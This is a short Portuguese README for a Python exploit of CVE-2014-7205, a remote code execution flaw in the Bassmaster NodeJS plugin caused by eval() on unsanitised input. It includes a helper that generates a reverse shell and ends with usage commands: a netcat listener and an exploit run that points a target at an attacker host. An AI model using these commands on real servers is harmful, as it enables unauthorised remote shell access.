
Bassmaster Plugin NodeJS RCE
bassmaster-rce.py: Um script Python para explorar CVE-2014-7205. nodeshell.py: Um módulo Python para gerar um reverse shell para NodeJS
!!Use apenas contra servidores nos quais você tem permissão para testar
CVE-2014-7205 é uma vulnerabilidade de Execução Remota de Código no Plugin Bassmaster para NodeJS. Todas as versões <= 1.5.1 são afetadas. A vulnerabilidade existe dentro do arquivo lib/batch.js na função internals.batch, onde uma chamada a eval() usa entrada de usuário escapada de forma inadequada (basicamente a regex não verifica se as requisições contêm código malicioso).
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444